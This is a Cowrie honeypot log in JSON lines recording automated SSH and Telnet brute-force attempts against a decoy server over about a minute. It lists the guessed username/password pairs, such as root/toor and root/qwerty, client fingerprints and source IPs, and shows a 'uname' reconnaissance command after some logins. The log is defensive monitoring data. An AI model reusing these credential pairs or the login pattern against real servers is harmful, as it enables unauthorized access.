{"eventid":"cowrie.login.failed","username":"esadmin","password":"esadmin","message":"login attempt [esadmin/esadmin] failed","sensor":"my-vps","timestamp":"2025-08-28T06:10:41.362776Z","src_ip":"212.227.125.160","session":"b9f7894d2016"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:10:42.468877Z","src_ip":"212.227.125.160","session":"b9f7894d2016"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45738,"dst_ip":"1.2.3.4","dst_port":22,"session":"f8fcf4297005","protocol":"ssh","message":"New connection: 212.227.235.229:45738 (1.2.3.4:22) [session: f8fcf4297005]","sensor":"my-vps","timestamp":"2025-08-28T06:10:47.666129Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:10:47.667059Z","src_ip":"212.227.235.229","session":"f8fcf4297005"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:10:47.810814Z","src_ip":"212.227.235.229","session":"f8fcf4297005"}
{"eventid":"cowrie.login.success","username":"root","password":"1qazxsw2","message":"login attempt [root/1qazxsw2] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:10:48.244685Z","src_ip":"212.227.235.229","session":"f8fcf4297005"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:10:48.609515Z","src_ip":"212.227.235.229","session":"f8fcf4297005"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:10:48.610187Z","src_ip":"212.227.235.229","session":"f8fcf4297005"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:10:48.755989Z","src_ip":"212.227.235.229","session":"f8fcf4297005"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:10:48.757059Z","src_ip":"212.227.235.229","session":"f8fcf4297005"}
{"eventid":"cowrie.session.closed","duration":35.578457832336426,"message":"Connection lost after 35 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:10:52.689961Z","src_ip":"8.222.212.69","session":"ac4a3e224a0d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52490,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e30cf2b225a","protocol":"ssh","message":"New connection: 212.227.125.160:52490 (1.2.3.4:22) [session: 8e30cf2b225a]","sensor":"my-vps","timestamp":"2025-08-28T06:10:55.413794Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:10:55.424368Z","src_ip":"212.227.125.160","session":"8e30cf2b225a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:10:55.523227Z","src_ip":"212.227.125.160","session":"8e30cf2b225a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50990,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d80340ea6a3","protocol":"ssh","message":"New connection: 212.227.125.160:50990 (1.2.3.4:22) [session: 5d80340ea6a3]","sensor":"my-vps","timestamp":"2025-08-28T06:10:55.788731Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:10:55.789785Z","src_ip":"212.227.125.160","session":"5d80340ea6a3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:10:55.893114Z","src_ip":"212.227.125.160","session":"5d80340ea6a3"}
{"eventid":"cowrie.login.failed","username":"flask","password":"123456","message":"login attempt [flask/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:10:55.938463Z","src_ip":"212.227.125.160","session":"8e30cf2b225a"}
{"eventid":"cowrie.login.success","username":"root","password":"1qazxsw2","message":"login attempt [root/1qazxsw2] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:10:56.223763Z","src_ip":"212.227.125.160","session":"5d80340ea6a3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:10:56.449184Z","src_ip":"212.227.125.160","session":"5d80340ea6a3"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:10:56.449954Z","src_ip":"212.227.125.160","session":"5d80340ea6a3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:10:56.565319Z","src_ip":"212.227.125.160","session":"5d80340ea6a3"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:10:56.566770Z","src_ip":"212.227.125.160","session":"5d80340ea6a3"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:10:57.045457Z","src_ip":"212.227.125.160","session":"8e30cf2b225a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44424,"dst_ip":"1.2.3.4","dst_port":22,"session":"2fa225fea7d7","protocol":"ssh","message":"New connection: 212.227.235.229:44424 (1.2.3.4:22) [session: 2fa225fea7d7]","sensor":"my-vps","timestamp":"2025-08-28T06:11:02.688357Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:11:02.689342Z","src_ip":"212.227.235.229","session":"2fa225fea7d7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:11:02.832911Z","src_ip":"212.227.235.229","session":"2fa225fea7d7"}
{"eventid":"cowrie.login.failed","username":"flask","password":"123456","message":"login attempt [flask/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:11:03.265552Z","src_ip":"212.227.235.229","session":"2fa225fea7d7"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:11:04.410429Z","src_ip":"212.227.235.229","session":"2fa225fea7d7"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":46556,"dst_ip":"1.2.3.4","dst_port":23,"session":"bcf15187325b","protocol":"telnet","message":"New connection: 8.222.212.69:46556 (1.2.3.4:23) [session: bcf15187325b]","sensor":"my-vps","timestamp":"2025-08-28T06:11:07.740254Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36359,"dst_ip":"1.2.3.4","dst_port":23,"session":"6278577ae1ab","protocol":"telnet","message":"New connection: 212.227.235.229:36359 (1.2.3.4:23) [session: 6278577ae1ab]","sensor":"my-vps","timestamp":"2025-08-28T06:11:09.710384Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47860,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2a816df0e97","protocol":"ssh","message":"New connection: 212.227.125.160:47860 (1.2.3.4:22) [session: d2a816df0e97]","sensor":"my-vps","timestamp":"2025-08-28T06:11:10.207684Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:11:10.252797Z","src_ip":"212.227.125.160","session":"d2a816df0e97"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:11:10.341012Z","src_ip":"212.227.125.160","session":"d2a816df0e97"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"deploy123","message":"login attempt [deploy/deploy123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:11:10.726769Z","src_ip":"212.227.125.160","session":"d2a816df0e97"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:11:11.833561Z","src_ip":"212.227.125.160","session":"d2a816df0e97"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45196,"dst_ip":"1.2.3.4","dst_port":22,"session":"bae7f1d27ea2","protocol":"ssh","message":"New connection: 212.227.235.229:45196 (1.2.3.4:22) [session: bae7f1d27ea2]","sensor":"my-vps","timestamp":"2025-08-28T06:11:20.369948Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:11:20.370980Z","src_ip":"212.227.235.229","session":"bae7f1d27ea2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:11:20.515423Z","src_ip":"212.227.235.229","session":"bae7f1d27ea2"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"deploy123","message":"login attempt [deploy/deploy123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:11:20.950798Z","src_ip":"212.227.235.229","session":"bae7f1d27ea2"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:11:22.098992Z","src_ip":"212.227.235.229","session":"bae7f1d27ea2"}
{"eventid":"cowrie.session.closed","duration":48.08667731285095,"message":"Connection lost after 48 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:11:24.727524Z","src_ip":"212.227.125.160","session":"83955fd22198"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48764,"dst_ip":"1.2.3.4","dst_port":22,"session":"66904ec8d9ab","protocol":"ssh","message":"New connection: 212.227.125.160:48764 (1.2.3.4:22) [session: 66904ec8d9ab]","sensor":"my-vps","timestamp":"2025-08-28T06:11:24.965975Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:11:24.976426Z","src_ip":"212.227.125.160","session":"66904ec8d9ab"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:11:25.071565Z","src_ip":"212.227.125.160","session":"66904ec8d9ab"}
{"eventid":"cowrie.login.success","username":"root","password":"toor","message":"login attempt [root/toor] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:11:25.497925Z","src_ip":"212.227.125.160","session":"66904ec8d9ab"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:11:25.820991Z","src_ip":"212.227.125.160","session":"66904ec8d9ab"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:11:25.821751Z","src_ip":"212.227.125.160","session":"66904ec8d9ab"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:11:25.928117Z","src_ip":"212.227.125.160","session":"66904ec8d9ab"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:11:25.929264Z","src_ip":"212.227.125.160","session":"66904ec8d9ab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39959,"dst_ip":"1.2.3.4","dst_port":23,"session":"33f431e3e2ed","protocol":"telnet","message":"New connection: 212.227.235.229:39959 (1.2.3.4:23) [session: 33f431e3e2ed]","sensor":"my-vps","timestamp":"2025-08-28T06:11:34.367929Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39468,"dst_ip":"1.2.3.4","dst_port":22,"session":"0fbbab7b0f54","protocol":"ssh","message":"New connection: 212.227.125.160:39468 (1.2.3.4:22) [session: 0fbbab7b0f54]","sensor":"my-vps","timestamp":"2025-08-28T06:11:39.841681Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:11:39.852836Z","src_ip":"212.227.125.160","session":"0fbbab7b0f54"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:11:39.951647Z","src_ip":"212.227.125.160","session":"0fbbab7b0f54"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty","message":"login attempt [root/qwerty] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:11:40.377034Z","src_ip":"212.227.125.160","session":"0fbbab7b0f54"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:11:40.681064Z","src_ip":"212.227.125.160","session":"0fbbab7b0f54"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:11:40.681826Z","src_ip":"212.227.125.160","session":"0fbbab7b0f54"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:11:40.787269Z","src_ip":"212.227.125.160","session":"0fbbab7b0f54"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:11:40.788360Z","src_ip":"212.227.125.160","session":"0fbbab7b0f54"}
